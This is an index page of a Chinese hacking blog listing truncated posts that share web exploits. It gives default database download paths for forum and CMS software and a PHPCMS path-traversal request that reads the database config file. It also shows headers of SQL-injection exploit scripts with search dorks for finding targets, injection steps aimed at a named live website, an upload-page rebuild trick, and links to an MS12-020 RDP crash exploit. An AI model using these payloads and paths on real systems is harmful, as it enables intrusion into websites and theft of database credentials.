小马博客

一个无聊的人,一个无聊的博客

\include\dialog\config.php //检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==-1) { if($cuserLogin->adminDir=='') { exit('Request Error!'); } $gurl = "../../{$cuserL...

发布 1 条评论

网站默认数据库及账号密码 /data/dvbbs7.mdb 动网论坛数据库 /databackup/dvbbs7.mdb 动网论坛数据库 /bbs/databackup/dvbbs7.mdb 动网论坛数据库 /admin/data/qcdn_news.mdb 青创文章管理系统数据库 /data/qcdn_news.mdb 青创文章管...

发布 0 条评论

漏洞利用代码: /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q =../../phpsso_server/caches/configs/database.php database.php为数据库配置文件

发布 0 条评论

[php]1.<?php 2.# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞 3.# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados" 4.# Version: 2.6.1 5.# Tested on: Debian GNU/Linux 6.7./...

发布 0 条评论

[php]< ? php /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword “Powered by www.ff84.com” */ error_reporting(E_ERROR); set_time_limit(0); if ($argc<...

发布 0 条评论

爆路径:data/mysql_error_trace.inc ①注入漏洞。 这站 http://www.30tianlong.com/ 首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明...

发布 1 条评论

好多站长们多把TEST.HTML给删了。可是上传的 文件没删。这样的话可以自己在构造一个。 把以下代码保存成TEST.HTML就行了。然后修改里面的上传文件。 [php] <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN&quo...

发布 0 条评论

[css autolinks="false" classname="myclass" collapse="false" firstline="1" gutter="true" highlight="1-3,6,9" htmlscript="false" light="false" padlinenumbers="false" smarttabs="true" tabsize="4" toolbar="true" title="...

发布 0 条评论

要用到freerdp模块 下载地址:https://github.com/FreeRDP/FreeRDP/downloads EXP下载:http://www.i0day.com//gjb/ms12-020.txt windows下蓝屏版,测试windows2003有效果,xp没什么效果 下载地址:http://115.com/file/ansmvsf0#

发布 0 条评论